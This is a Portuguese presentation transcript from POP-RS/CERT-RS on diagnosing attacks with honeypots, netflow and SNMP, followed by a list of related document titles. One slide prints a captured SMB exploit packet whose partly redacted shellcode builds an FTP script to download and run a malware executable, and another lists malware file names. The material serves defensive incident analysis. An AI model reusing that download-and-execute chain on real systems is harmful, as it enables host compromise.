Diagnóstico de Ataques Utilizando Ferramentas de Gerência de Rede e Honeypots
|
|
- Ângela Almeida Chaplin
- 7 Há anos
- Visualizações:
Transcrição
1 Diagnóstico de Ataques Utilizando Ferramentas de Gerência de Rede e Honeypots Émerson Virti, João Marcelo Ceron, Leandro Márcio Bertholdo { emerson, ceron, berthold }@pop-rs.rnp.br Liane M. R. Tarouco (liane@penta.ufrgs.br) 1
2 Sumário Introdução A hipótese da proximidade da referência Honeypots como uma linha de defesa Coleta de Dados Amostragens estatísticas em diferentes blocos IP (comerciais, acadêmicos, cable-modem) Resultados Estatísticos Verificação de comportamento anômalo Verificação de um pacote enviado ao honeypot Varredura de portas Netflow snmpv3 Conclusões 2
3 Introdução Várias instituições foram convidadas a participar do Projeto Honeypots Distribuídos Reticentes quanto ao uso de seus dados Descontentes com a quantidade de informações retornadas Esse problema precisava ser resolvido!!!! 3
4 A hipótese da proximidade da referência Segundo Thorsten Holz em sua tese New Fields of Application for Honeynets (ago/05), a maioria dos malwares, vermes e vírus tentam atacar alvos próximos ao seu espaço de endereçamento (mesma sub-rede ou classe B) Isso indica que quanto mais próximo de uma máquina contaminada maiores as chances de sofrer um ataque no inicio da contaminação (proximidade da referência) 4
5 Honeypots como linha de defesa A hipótese da proximidade foi confirmada no honeypot situado no POP-RS/CERT-RS Próximo passo: testar em outras instituições Usado honeypots no lugar de darknets: Mais informações obtidas principalmente sobre malwares 5
6 E-crime Watch Report POP-RS / CERT-RS 6
7 Esquema de Coleta Vários fragmentos de blocos sem uso foram anunciados internamente para cada instituição. Como o honeypot estava fora da instituição os filtros anti-spoofing foram temporariamente adequados para a nova situação. 7
8 Esquema de Coleta Todos os blocos livres coletavam o equivalente a um /16 Aproximadamente 65 mil hosts emulados 8
9 Esquema de Coleta 9
10 Pacotes por segundo POP-RS / CERT-RS Resultados Pacotes por Segundo 10
11 Bits por Segundo POP-RS / CERT-RS Resultados Bits por Segundo 11
12 Problemas Encontrados Problemas de memória (ARPtable) Problemas com CPU (número de pacotes) 12
13 Tentativas de Acesso ao Honeypot Média das Tentativas de Acesso por Dia TOTAL/DIA Scan/IP Scan/IP/Hora Acadêmico / ,48 82,39 ~ 1,3 scan/min Comercial / ,16 9,84 Acadêmico / ,23 5,05 Cable / ,85 53,4 ~ 0,88 scan/min 13
14 Origem das Tentativas de Acesso Tentativas de Acesso 49% Fonte brasileira Fonte n-brasileira 51% 14
15 Estatísticas Origem das Tentativas de Acesso Cable /20 50% 50% IP Brasileiros IP Internacional Acadêmico /17 2% 98% 15
16 Portas mais Acessadas Top TCP ,16% ,27% ,43% 3,54% 2,42% 1,92% 1,37% 0,54% Top UDP 1,63% 0,33% 0,24% 0,09% ,46% 25 0,39% 16
17 Sistema Operacional Fonte - Fingerprint Sistema Operacional Fonte Windows Linux Solaris OpenBSD FreeBSD NetBSD Outros 96,93% 2,98% 0,04% 0,03% 0,01% 0,01% 0,01% 17
18 Utilizando o Honeyd HONEYD Implementação de honeypots de baixa interatividade Possibilidade da emulação da pilha TCP/IP de vários sistemas operacionais Permite a criação de Listners para a emulação de diversos serviços Maior consumo de CPU 18
19 Listner de Coleta de Links de Malware MSupdate.exe XPService.exe bling.exe ccenmgr.exe csexp.exe hostin.exe intec.exe internet4.exe ipxroute32x.exe msfdfe.exe msmsgrs.exe msnm msnmsg msnmsgr.ex msnmsgr.exe msnmsgrs.exe phr.exe rasdfgl32.exe reg1x.exe rundll32.exe sdsys.exe servs.exe spdauth.exe sysin.pif taskmegr.exe taskmnegr.exe taskngr.exe uniwins.exe updaters.exe winddr.exe wlmsn.exe wmiapsrv.exe wuamkop32.exe zlclient.exe 19
20 Verificação do Conteúdo do Pacote Enviado ao Honeypot 14:26: IP?.?.?.?.2913 >?.?.?.?.445:. 142:1586(1444) ack 1 win x0380: AAAAAAAAAAAAAAAA 0x0470: AAAAAAAAAAAAAAAA 0x0480: AAAAAAAAAAAAAAAA 0x0490: c a AA..#..W...B. 0x04a0: c454 f2ff fffc e B.B.B..T...F.. 0x04b0: 008b 453c 8b7c ef 8b4f 188b 5f20..E<..x...O.._. 0x04c0: 01eb e32e 498b 348b 01ee 31c0 99ac 84c0...I x04d0: 7407 c1ca 0d01 c2eb f43b e38b t...;t$.u.. 0x04e0: 5f24 01eb 668b 0c4b 8b5f 1c01 eb8b 1c8b $..f..k._... 0x04f0: 01eb 895c 2404 c331 c064 8b c078...\$..1.d.@0..x 0x0500: 0f8b 400c 8b70 1cad 8b68 08e9 0b @..p...h... 0x0510: 8b c b68 3c5f 31f @4....h<_1.`V 0x0520: eb0d 68ef cee fe 8a0e 57ff e7e8..h...`h...w... 0x0530: eeff ffff 636d f6b f20...cmd./k.echo. 0x0540: 6f70 656e **** **** **** **** open x0550: e >.i&ech 0x0560: 6f e 3e o.user.1.1.>>.i. 0x0570: f d &echo.get.erasem 0x0580: 655f e e3e 2069 e_48316.exe.>>.i 0x0590: f e3e 2069.&echo.quit.>>.i 0x05a0: d6e 202d 733a &ftp.-n.-s:i.&e 0x05b0: d65 5f e raseme_48316.exe 0x05c0: 0d0a BBBBBBBBBBBBB 0x05d0: BBBBBBBBBB 20
21 Objetivos da Coleta de Dados no Honeypot Verificação de endereços da rede da instituição tentando acessar o honeypot Ação de malware ou atacante Erro de configurações Coleta de links de malware 21
22 Passo Seguinte Após encontrado um endereço da rede privada nos logs do honeypot Verificação da ação do malware ou atacante Varredura de portas Netflow SNMP 22
23 Varredura de portas Possibilidade da descoberta de alguma backdoor Problemas envolvidos Apenas com permissão Pode ser interpretado como ataque Backdoors em portas conhecidas Tráfego 23
24 Varredura de portas # nmap ss O <endereco> Starting nmap 3.48 Interesting ports on <endereco>: (The 1651 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1027/tcp open IIS Device type: general purpose Running: Microsoft Windows NT/2K/XP OS details: Microsoft Windows 2000 SP3 24
25 Netflow Possibilidade de verificação do comportamento do endereço IP que acessou o honeypot Através do conteúdo dos listners, possibilidade da descoberta de novas máquinas comprometidas na rede 25
26 Verificação de diferentes objetos POP-RS / CERT-RS SNMP Várias formas de se caracterizar a ação de um malware 26
27 SNMP Objetos sysdescr: Hardware: x86 Family 5 Model 4 Stepping 3 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 hrsystemuptime: 0 days 10h:05m:02s.74th 27
28 SNMP Diferentes Indicativos tcpoutrsts - Varredura de portas 28
29 tcpoutrsts POP-RS / CERT-RS SNMP Diferentes Indicativos Servidor de mail (POP-RS) 4074 Endereço Suspeito
30 SNMP Diferentes Indicativos tcpconnremport tcpconnremport.?.?.?.?.1031.?.?.? tcpconnremport.?.?.?.?.1032.?.?.? tcpconnremport.?.?.?.?.1033.?.?.? tcpconnremport.?.?.?.?.1034.?.?.? tcpconnremport.?.?.?.?.1035.?.?.? tcpconnremport.?.?.?.?.1036.?.?.? tcpconnremport.?.?.?.?.1037.?.?.? tcpconnremport.?.?.?.?.1039.?.?.? tcpconnremport.?.?.?.?.1040.?.?.? tcpconnremport.?.?.?.?.1041.?.?.?
31 tcpconnlocalport POP-RS / CERT-RS SNMP Diferentes Indicativos tcpconnlocalport tcpconnlocalport tcpconnlocalport tcpconnlocalport
32 SNMP Outros Objetos udpnoports indício de scan RMON hosttopntable quem está transmitindo muito 32
33 SNMP Problemas Possibilidades de falso positivo Mas e o acesso ao honeypot? Hosts e dispositivos de rede sem SNMP habilitado Segurança Possibilidade de usar SNMPV3 33
34 CONCLUSÕES Malwares tem maior probabilidade de fazerem scans em IPs próximos Quantidade de scans ruído Possibilidade de, através de honeypots, verificar o comportamento anômalo de hosts da rede 34
35 CONCLUSÕES Possibilidade de verificar links que contém malwares Integração entre ferramentas de segurança e gerência Comportamento pró-ativo relativo a segurança 35
36 Dúvidas, questionamentos, sugestões... Contato no POP-RS Contato: Obrigado! 36
André Luis Staroski Clovis Cristiano Brignoli Fabiano F. Maciel Guimarães
André Luis Staroski Clovis Cristiano Brignoli Fabiano F. Maciel Guimarães O Nmap é um portscan de uso geral; O Nmap está disponível em todas as principais distribuições; O uso mais simples é escanear
Levantamento de informação (Fingerprint)
Levantamento de informação (Fingerprint) Continuação... Prof. Pedro Filho Objetivos Mapear hosts ativos na rede Obter versões dos sistemas operacionais Entender aquisição de banners Identificar os serviços
Segurança e Auditoria de Sistemas. Jéfer Benedett Dörr
Segurança e Auditoria de Sistemas Jéfer Benedett Dörr prof.jefer@gmail.com Conteúdo Ssh menos brute force nmap Bloqueando ataques de força bruta no SSH O SSH é um protocolo de acesso remoto muito seguro,
20º Fórum de Certificação para Produtos de Telecomunicações 30 de novembro de 2016 Campinas, SP
20º Fórum de Certificação para Produtos de Telecomunicações 30 de novembro de 2016 Campinas, SP Problemas de Segurança e Incidentes com CPEs e Outros Dispositivos Cristine Hoepers cristine@cert.br Incidentes
Redes de computadores
Redes de computadores Atividade realizada: Identificar serviços de portas aberta tanto na rede cabeada quanto wi-fi: Ferramenta utilizada para identificar serviços e portas abertas na rede foi o Nmap:
Disciplina: Segurança de Redes. Professor: Roitier Campos
Disciplina: Segurança de Redes Professor: Roitier Campos NMAP O Nmap ( Network Mapper ) é uma ferramenta de código aberto para exploração de rede e auditoria de segurança. Ela foi desenhada para escanear
IX Fórum de dezembro de 2016 São Paulo, SP
IX Fórum 10 05 de dezembro de 2016 São Paulo, SP IoT no cenário atual de ataques DDoS Miriam von Zuben miriam@cert.br Cenário atual Ataques DDoS Estatísticas CERT.br Notificações sobre computadores participando
Princípios em Segurança da Informação
Atividade realizada: Princípios em Segurança da Informação Produzir Um relatório com todos os dados gerados a partir da identificação de serviços e portas abertas na rede. Método de uso: O Nmap ( Network
IX Fórum Regional São Paulo, SP 10 de novembro de 2017
IX Fórum Regional São Paulo, SP 10 de novembro de 2017 Ataques Mais Significativos e Como Melhorar o Cenário Cristine Hoepers, D.Sc. Gerente Geral cristine@cert.br Klaus Steding-Jessen, D.Sc. Gerente Técnico
(In)segurança Utilizando Software Livre. Maycon Maia Vitali mayconmaia@yahoo.com.br
(In)segurança Utilizando Software Livre Maycon Maia Vitali mayconmaia@yahoo.com.br Agenda Introdução Quem sou eu? Porque aprender sobre (in)segurança? Ferramentas nmap Scanner de rede iptables Firewall
Ademar de Souza Reis Jr. <ademar@conectiva.com.br> http://www.ademar.org. XII Congresso C. Computação Bolívia Tarija Bolívia Outubro 2005
TCP/IP e Service Fingerprinting Como descobrir informações a respeito de um host remoto explorando detalhes da implementação da pilha TCP/IP e seus serviços Ademar de Souza Reis Jr.
TECNOLOGIA DA INFORMAÇÃO
PÓS EM COMÉRCIO EXTERIOR E ESTRATÉGIA UNIVERSIDADE CATÓLICA DE PETRÓPOLIS CENTRO DE CIÊNCIAS SOCIAIS APLICADAS TECNOLOGIA DA INFORMAÇÃO.:UNIDADE 5 - SEGURANÇA DA INFORMAÇÃO:. PARTE 2 - AMEAÇAS A SEGURANÇA
Gerência de Redes de Computadores RMON. Prof. Alex Furtunato
Gerência de Redes de Computadores RMON Prof. Alex Furtunato alex.furtunato@ifrn.edu.br Limitações da MIB-II O gerenciamento é realizado em cada dispositivos individualmente Os dispositivos gerenciados
PROJETO INICIATIVA INTERNET SEGURA. Gilberto Zorello
PROJETO INICIATIVA INTERNET SEGURA Gilberto Zorello gzorello@nic.br Projeto Iniciativa Internet Segura [1] Motivação Ataques à infraestrutura e aos serviços disponíveis na Internet estão cada vez mais
IX (PTT) Fórum 11 São Paulo, SP 04 de dezembro de 2017
IX (PTT) Fórum 11 São Paulo, SP 04 de dezembro de 2017 Cenário de Abuso dos Sistemas Autônomos Brasileiros Cristine Hoepers, D.Sc. Gerente Geral cristine@cert.br Estrutura do NIC.br Tratamento de Incidentes
Sistemas de Detecção de Intrusão
Sistemas de Detecção de Intrusão Gabriel Antonio Fontes Rebello Matheus Lemos dos Reis Rafael Gonçalves Damasceno Raphael Oliveira Sathler de Souza Rodrigo Carvalho Ribeiro de Jesus Contexto para Sistemas
HoneyPot Web: análise do tráfego web malicioso. João Marcelo Ceron Liane Tarouco Leandro Bertholdo Leonardo Lemes Glauco Ludwig
HoneyPot Web: análise do tráfego web malicioso João Marcelo Ceron Liane Tarouco Leandro Bertholdo Leonardo Lemes Glauco Ludwig Sumário Introdução Motivação HoneyPot Web Experimentos Resultados Conclusões
O Nmap - Network Mapper é uma ferramenta de código aberto para exploração de rede e auditoria de segurança.
O Nmap - Network Mapper é uma ferramenta de código aberto para exploração de rede e auditoria de segurança. Ela foi desenvolvida para escanear rapidamente redes amplas, embora também funcione muito bem
Configuração da recusa de técnicas de prevenção do serviço (série da Segurança) em switch empilhável do Sx500 Series
Configuração da recusa de técnicas de prevenção do serviço (série da Segurança) em switch empilhável do Sx500 Series Objetivo A recusa de serviço (DoS) ou a recusa distribuída de ataques do serviço (DDoS)
PROGRAMA POR UMA INTERNET MAIS SEGURA. Gilberto Zorello
PROGRAMA POR UMA INTERNET MAIS SEGURA Gilberto Zorello gzorello@nic.br Panorama Atual Ataques à infraestrutura e aos serviços disponíveis na Internet estão cada vez mais comuns. O nic.br analisa a tendência
Gerência de Redes Turma : V
Gerência de Redes Turma : 20171.5.01405.1V RMON Prof. Thiago Dutra Agenda n Introdução n Monitores n Objetivos n MIB RMON n Grupos n RMON2 n Histórico n MIB RMON2 2 1 Introdução
Faculdade de Tecnologia SENAC Goiás Segurança da Informação. Aldo Brito da Costa Filho Levi Souza Matheus Marçal Matheus Oliveira
Faculdade de Tecnologia SENAC Goiás Segurança da Informação Aldo Brito da Costa Filho Levi Souza Matheus Marçal Matheus Oliveira Relatório estatístico sobre o ataque MITM Goiânia 2015 1 Aldo Brito Levi
Gerenciamento de Redes. Alan Santos
Gerenciamento de Redes Alan Santos Ciclo de gerenciamento Quando falamos de gerenciamento de redes devemos primeiro estabelecer o que será gerenciado e o que se espera como resultado desse gerenciamento.
Segurança de Redes 5º Semestre
Segurança de Redes 5º Semestre Evasão de Firewall Prof. Nataniel Vieira nataniel.vieira@gmail.com SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS Objetivos Conhecer os
Propostas de critérios de gerência para os PTTs Brasileiros
Propostas de critérios de gerência para os PTTs Brasileiros Luciano P.Gomes lgomes@registro.br Leandro Bertholdo berthold@penta.ufrgs.br Andrey Andreoli andrey@tche.br Emerson Virti emerson@pop-rs.rn.br
Uso de Honeypots de Baixa Interatividade na Resposta a Incidentes de Segurança
Uso de Honeypots de Baixa Interatividade na Resposta a Incidentes de Segurança NIC BR Security Office NBSO Brazilian Computer Emergency Response Team Comitê Gestor da Internet no Brasil http://www.nbso.nic.br/
Firewalls Reginaldo Campos 1
Firewalls Reginaldo Campos 1 Roteiro Introdução Características do Firewall Tipo de Firewall Filtro de Pacotes Servidores Proxy Tipos avançados de Firewall Bastion Host Firewalls híbridos 2 Roteiro (cont)
Sistemas Distribuídos
Sistemas Distribuídos Segurança Prof. Emerson Ribeiro de Mello Instituto Federal de Santa Catarina IFSC campus São José mello@ifsc.edu.br http://docente.ifsc.edu.br/mello 9 de dezembro de 2015 1/35 Ataques
HoneyPot e HoneyNet. Reginaldo Campos Segurança em Redes de Computadores
HoneyPot e HoneyNet Reginaldo Campos Segurança em Redes de Computadores Motivação Para se defender do inimigo, primeiro é preciso conhecê-lo, ou seja, conhecer seus métodos de ataque, suas ferramentas,
Redes de Dados e Comunicações
Redes de Dados e Comunicações Prof.: Fernando Ascani Endereçamento IP Endereço IP Basicamente as máquinas quando estão ligadas em rede possuem um endereço IP configurado (seja ele IPv4 (normalmente) ou
Verificando se os hosts estão ativos
Verificando se os hosts estão ativos Em um processo de scanning, precisamos investigar se os sistemas alvos estão ativos. Lembre-se que enquanto você estava coletando informações, você deve ter pego o
AULA EXPOSITIVA SOBRE: CONCEITOS E IMPLEMENTAÇÃO DE FIREWALL, VPN E SSH (REDES PRIVADAS E SERVIÇOS DE ACESSO REMOTO)
AULA EXPOSITIVA SOBRE: CONCEITOS E IMPLEMENTAÇÃO DE FIREWALL, VPN E SSH (REDES PRIVADAS E SERVIÇOS DE ACESSO REMOTO) Wanderléa Teixeira Gnoato Lodi gnoatow@yahoo.com.br 10 de Outubro de 2011 Roteiro de
Configurando uma regra de descoberta de rede
2018/02/15 10:14 1/6 Configurando uma regra de descoberta de rede Configurando uma regra de descoberta de rede Visão geral As regras de descoberta de rede são utilizadas pelo Zabbix para descobrir hosts
Gerência de Redes de Computadores. 05 Gerência de Hospedeiros (Hosts)
Gerência de Redes de Computadores 05 Gerência de Hospedeiros (Hosts) UFCG / DSC / JPS * 05 GERÊNCIA DE HOSPEDEIROS 1 TIPOS DE HOSPEDEIROS DOIS TIPOS DE HOSPEDEIROS o Estações Servidores o Estações Clientes
Fundamentos de Redes. Introdução ao Endereço IP TCP/IP. Professor Airton Ribeiro de Sousa 2016
Fundamentos de Redes Introdução ao Endereço IP TCP/IP 1 Professor Airton Ribeiro de Sousa 2016 Introdução ao Protocolo TCP/IP - Arquitetura Inicialmente para abordamos o tema Endereço IP, é necessário
Protótipo de um software de segurança em redes para monitoração de pacotes em uma conexão TCP/IP
Protótipo de um software de segurança em redes para monitoração de pacotes em uma conexão TCP/IP Acadêmico: Paulo Fernando da Silva Orientador: Sérgio Stringari Roteiro Introdução Fundamentos Segurança
SISTEMAS DE INFORMAÇÃO Redes de Computadores II. Firewall
Firewall Um firewall é um dispositivo de controle de acesso que olha para o pacote IP, compara com regras de política e dispositivos para permitir. Negar ou toma alguma outra ação no pacote. Um firewall
Microcurso: Honeypots e Honeynets
Microcurso: Honeypots e Honeynets Antonio Montes Cristine Hoepers Klaus Steding-Jessen Instituto Nacional de Pesquisas Espaciais INPE Ministério da Ciência e Tecnologia NIC BR Security Office NBSO Comitê
Configurando uma regra de descoberta de rede
2017/10/28 02:04 1/6 Configurando uma regra de descoberta de rede Configurando uma regra de descoberta de rede Visão geral As regras de descoberta de rede são utilizadas pelo Zabbix para descobrir hosts
Configurando uma regra de descoberta de rede
2017/10/15 08:20 1/6 Configurando uma regra de descoberta de rede Configurando uma regra de descoberta de rede Visão geral As regras de descoberta de rede são utilizadas pelo Zabbix para descobrir hosts
Campus Capivari Análise e Desenvolvimento de Sistemas (ADS) Prof. André Luís Belini /
Campus Capivari Análise e Desenvolvimento de Sistemas (ADS) Prof. André Luís Belini E-mail: prof.andre.luis.belini@gmail.com / andre.belini@ifsp.edu.br MATÉRIA: SEG Aula N : 11 Tema: Servidores Proxies
Gerenciamento de redes Internet
Gerenciamento de redes Internet Liane Tarouco UFRGS Funções de gerenciamento Gerenciamento de problemas Gerenciamento de performance Gerenciamento de configuração Gerenciamento de contabilização Gerenciamento
Servidor de Monitoramento
Servidor de Monitoramento Open Audit Open-audit é uma aplicação que é capaz de lhe dizer exatamente o que está acontecendo em sua rede, como ela está configurado corretamente e quando a mesma sofre alteração.
Alunos em técnico em Informática da EAFS: Leandro Cavalari, Maria Matos e Renata Rasche.
sem que para tanto, o usuário necessite ter muito conhecimento no assunto. Vale citar que o Windows XP já vem com um firewall, que apesar de não ser tão eficiente, é um bom aliado na segurança. Para ativá-lo,
Camada de Transporte Protocolos TCP e UDP
Arquitetura de Redes de Computadores e Tecnologia de Implementação de Redes 2016.1 Camada de Transporte Protocolos TCP e UDP Curso Técnico Integrado em Informática Turma: INT.INF.3M Arquitetura de Redes
Firewall. Prof. Marciano dos Santos Dionizio
Firewall Prof. Marciano dos Santos Dionizio Firewall (definições) Por que do nome firewall? Antigamente, quando as casas eram feitas de madeira o fogo era um grande problema, pois se alastrava facilmente
GERENCIADOR DE REDE NTOP
GERENCIADOR DE REDE NTOP Anderson Escobar Hammes Rafael Schulte Marcos Pachola Horner Universidade Católica de Pelotas UCPel GERENCIAMENTO DE REDE Gerenciamento de rede é controlar todos os equipamentos
Tendências em Atividades Maliciosas na Internet Brasileira
Tendências em Atividades Maliciosas na Internet Brasileira Klaus Steding-Jessen jessen@cert.br Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no Brasil Núcleo de Informação e Coordenação
Experiências com 802.1x
Experiências com 802.1x João Marcelo Ceron Leandro Márcio Bertholdo Emerson Virti Liane Tarouco suporte@pop rs.rnp.br CERT RS / POP RS Centro de Resposta a Incidentes de Segurança da Rede Tchê Ponto de
Infra-Estrutura de Redes de Computadores
Infra-Estrutura de Redes de Computadores Atividade realizada: Identificar endereços ethernet das estações de trabalho e servidores. Método de uso: O Nmap ( Network Mapper ) uma ferramenta de código aberto
CST em Redes de Computadores
CST em Redes de Computadores Dispositivos de Rede I Aula 03 Básico de Switches Prof: Jéferson Mendonça de Limas O que é um Switch? Dispositivos que filtram e encaminham pacotes entre segmentos de redes
Endereçamento de Memórias e Lógica de Seleção
Capítulo 6 Endereçamento de Memórias e Lógica de Seleção 6.1 Introdução... 85 6.2 LÓGICA DE SELEÇÃO... 85 6.2.1 Decodificação não absoluta... 85 6.2.2 Decodificação absoluta:... 86 6.3 Exemplos de Circuitos
Avaliação de Implementações de mobilidade sobre IPv6
GTER-35 maio/2013 Avaliação de Implementações de mobilidade sobre IPv6 César A. H. Loureiro IF-RS / UFRGS Liane M. R. Tarouco - UFRGS Leandro Bertholdo - UFRGS Roteiro Motivação Objetivos Protocolos Avaliados
Ferramentas para Coexistência e Transição IPv4 e IPv6. Módulo 7
Ferramentas para Coexistência e Transição IP e IPv6 Módulo 7 ftp://ftp.registro.br/pub/stats/delegated-ipv6-nicbr-latest 250 200 150 100 50 0 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 Coexistência
Gerenciamento e Interoperabilidade de Redes
Gerenciamento e Interoperabilidade de Redes NetFlow e Syslog Prof. João Henrique Kleinschmidt Syslog Escreve mensagens de sistema em um log Permite a um dispositivo enviar notificações de eventos a coletores
Covert channels: o que são, o que fazem e como se prevenir contra eles
Covert channels: o que são, o que fazem e como - RNP Centro de Atendimento a Incidentes de Segurança - CAIS Dezembro de 2006 Ivo de Carvalho Peixinho ivocarv@cais.rnp.br RNP/PAL/0198 2006 RNP Sumário Introdução
Miriane Aparecida Batista Instituto Federal do Triângulo Mineiro Campus Paracatu Tecnólogo em Análises e Desenvolvimento de Sistemas. Cert.
Miriane Aparecida Batista Instituto Federal do Triângulo Mineiro Campus Paracatu Tecnólogo em Análises e Desenvolvimento de Sistemas Cert.br PARACATU, 2016 Resumo O Cert tem por definição: Centro de Estudos
Redes de Computadores 2008 Primeiro Trabalho Analisador de Redes
Redes de Computadores 2008 Primeiro Trabalho Analisador de Redes Prof. Ronaldo Alves Ferreira 1 Descrição do Trabalho Analisadores de redes são ferramentas de enorme valor para a depuração de protocolos
Controlando o Tráfego Peer-to-Peer
CERT-RS Controlando o Tráfego Peer-to-Peer Leandro Bertholdo, Andrey Andreoli, Liane Tarouco CERT-RS / POP-RS / UFRGS {andrey,berthold, liane}@penta.ufrgs.br {mell,emerson}@tche.br Sumário Histórico do
Checkhosts Monitoramento e Gerência de Sistemas
GTS 02.03 Grupo de Trabalho em Segurança de Redes Checkhosts Monitoramento e Gerência de Sistemas Anderson Alves, Fernando Spencer, Marcelo Portes, Márcio de Albuquerque e Marita Maestrelli ceo@cbpf.br
Planificação Anual da Disciplina de Sistemas Operativos - 12º 1PI
Módulo3-24Blocos Planificação Anual da Disciplina de Sistemas Operativos - 12º 1PI. Conhecer o enquadramento Sistema Operativo Windows Server Introdução ao S. O. Windows Server histórico do Windows Server
DHCP. Prof. Hederson Velasco Ramos REDES
Prof. Hederson Velasco Ramos REDES DHCP (Dynamic Host Configuration Protocol) É um protocolo, parte da pilha de serviços TCP/IP, que disponibiliza endereços ip por concessão e as configurações a dispositivos
INFO3M ARQ REDES. Prova 1 Bimestre. Obs: Questões RASURADAS são consideradas como ERRADAS GABARITO
INFO3M 2018.1 ARQ REDES Prova 1 Bimestre Obs: Questões RASURADAS são consideradas como ERRADAS GABARITO NOME: MATRÍCULA: Q U E S T Õ E S O B J E T I V A S (Valor de cada questão: 0,5 pts) 1. A técnica
Flexible NetFlow que filtra com monitoramento de desempenho
Flexible NetFlow que filtra com monitoramento de desempenho Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Configurar Diagrama da rede Configurações Verificar Troubleshooting Introdução
NetFlow para clientes do POP-RS
POP-RS / CERT-RS NetFlow para clientes do POP-RS João Marcelo Ceron Introdução Netflow Ferramentas Implementadas Relatórios Disponíveis Exemplos Conclusões Sumário 2 Necessidades e limitações das ferramentas
Redes de Computadores LTI
Redes de Computadores LTI Nível de Transporte na Internet Protocolo TCP Professores: António Casimiro, José Rufino, Pedro Ferreira [docentes rcp@listas.di.ciencias.ulisboa.pt] 2014/2015 Nível: Transporte
Redes de Computadores. A arquitectura protocolar TCP/IP
A arquitectura protocolar TCP/IP A arquitectura TCP/IP! Possui apenas 4 camadas ou níveis Aplicação FTP Telnet HTTP Transporte TCP UDP Rede IP Acesso à Rede Ethernet Pacotes por rádio ponto a ponto 2 Nível
Campus Capivari Técnico em Manutenção e Suporte em Informática Prof. André Luís Belini /
Campus Capivari Técnico em Manutenção e Suporte em Informática Prof. André Luís Belini E-mail: prof.andre.luis.belini@gmail.com / andre.belini@ifsp.edu.br MATÉRIA: SEGURANÇA DE REDES Aula N : 02 Tema:
PROVA 03/07 Segunda-feira (semana que vem)
damkeisabela@gmail.com PROVA 03/07 Segunda-feira (semana que vem) SISTEMAS OPERACIONAIS Os sistemas operacionais mais comuns que existem para computadores e que o mercado irá oferecer para você são : Microsoft
Hardening de equipamentos
Hardening de equipamentos Atividades nos Honeypots Distribuídos Força bruta de senhas (usado por malwares de IoT e para invasão de servidores e roteadores): Telnet (23/TCP) SSH (22/TCP) Outras TCP (2323,
Lista de Exercícios. Camada de Enlace de Dados
Lista de Exercícios Camada de Enlace de Dados 1. Um pacote de uma camada superior de redes é dividido em 10 quadros, e cada quadro tem 80% de chances de chegar sem danos. Se o protocolo de enlace de dados
Operations Research Serviços de Redes
Serviços de Redes 3º Ano / 1º Semestre 2017 lvilanculos@up.ac.mz Curso de Informática Docente: Luís Vilanculos 1 Virtualização Para entender perfeitamente o conceito da tecnologia, deve-se traçar um paralelo
Lista de exercícios - 1º bimestre 2016 REDES
Lista de exercícios - 1º bimestre 2016 REDES Jean Nicandros Stragalinos Neto. Prontuário: 1616251. Curso: ADS 2º Módulo. 1) Desenhe duas redes com 7 e 8 computadores e defina a configuração IP de cada
A instalação e configuração do módulo ampère com AnyConnect 4.x e ampère Habilitador
A instalação e configuração do módulo ampère com AnyConnect 4.x e ampère Habilitador Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Desenvolvimento de AnyConnect para o ampère Habilitador
PIkit : A New Kernel-Independent Processor-Interconnect Rootkit
PIkit : A New Kernel-Independent Processor-Interconnect Rootkit Autores do artigo: Wonjun Song, Hyunwoo Choi, Junhong Kim, Eunsoo Kim, Yongdae Kim, John Kim Apresentação: Vagner Kaefer Dos Santos Introdução
Estudo da Ferramenta NMAP
Estudo da Ferramenta NMAP Leandro Corrêa Brisolara Faculdade de Tecnologia Senac Pelotas(FATEC) Faculdade de Redes de Computadores Rua Gonçalves Chaves, 602 Centro Lea1174@gmail.com Resumo. Este artigo
Aspectos de segurança na conectividade da rede acadêmica. Italo Valcy 25/Set/2017, VII WTR do PoP-BA
Aspectos de segurança na conectividade da rede acadêmica Italo Valcy 25/Set/2017, VII WTR do PoP-BA Cenário atual Boa conectividade de rede na região metropolitana, links melhores
Backup e Restauração Banco de Dados. Evandro Deliberal
Backup e Restauração Banco de Dados Evandro Deliberal evandro@deljoe.com.br https://www.linkedin.com/in/evandrodeliberal Redes de armazenamento: Tecnologias e Virtualização Agenda I. DAS e Introdução a
Arquitetura TCP / IP propõe esquema de endereçamento universal - endereço IP que deve:
ENDEREÇAMENTO Arquitetura TCP / IP propõe esquema de endereçamento universal - endereço IP que deve: Identificar unicamente uma rede na Internet; Identificar unicamente cada máquina de uma rede. Um endereço
Utilizando Honeypots para Medição de Atividade de Rede não Usual na Internet
Utilizando Honeypots para Medição de Atividade de Rede não Usual na Internet Emerson Virti 1, Leandro Márcio Bertholdo 2, Liane Tarouco 1, Lisandro Granville 1 1 Instituto de Informática Universidade Federal
Configurar o mapa da classe de QoS IPv4 do cliente no WAP125 e no WAP581
Configurar o mapa da classe de QoS IPv4 do cliente no WAP125 e no WAP581 Objetivo A característica de QoS contém o apoio dos Serviços diferenciados (DiffServ) que permite que você classifique e controle
O Perfil da Segurança na Internet Através da Análise das Estatísticas do Consórcio Brasileiro de Honeypots
O Perfil da Segurança na Internet Através da Análise das Estatísticas do Consórcio Brasileiro de Honeypots Émerson Salvadori Virti Liane Tarouco Leandro Márcio Bertholdo /POP-RS Roteiro Apresentação do
NET-485 Instruções de placa Ethernet
NET-485 Instruções de placa Função Receba dados de alarme de saída do painel e transfira esses dados para um host de rede remoto. Dados técnicos. FIG.1 Alimentação DC 8~28V Consumo de Energia 10W Interface
Gerência de Redes de Computadores Remote Monitoring
Gerência de Redes de Computadores 04 - Remote Monitoring 1 SNMP e MIBs em agentes só permitem analisar valores isolados (nos agentes) Como medir o tráfego em um segmento de rede? tráfego = 137 kbps tráfego
Eduardo Barasal Morales Tiago Jun Nakamura Maputo, Moçambique 18/07/17-21/07/17
Eduardo Barasal Morales Tiago Jun Nakamura Maputo, Moçambique 18/07/17-21/07/17 Curso Presencial de IPv6 Serviços Agenda Motivação Serviços Implementações DNS NTP Servidores HTTP Proxies SMB CIFS ( SAMBA
Configuração do log de sistema no Roteadores RV016, RV042, RV042G e RV082 VPN
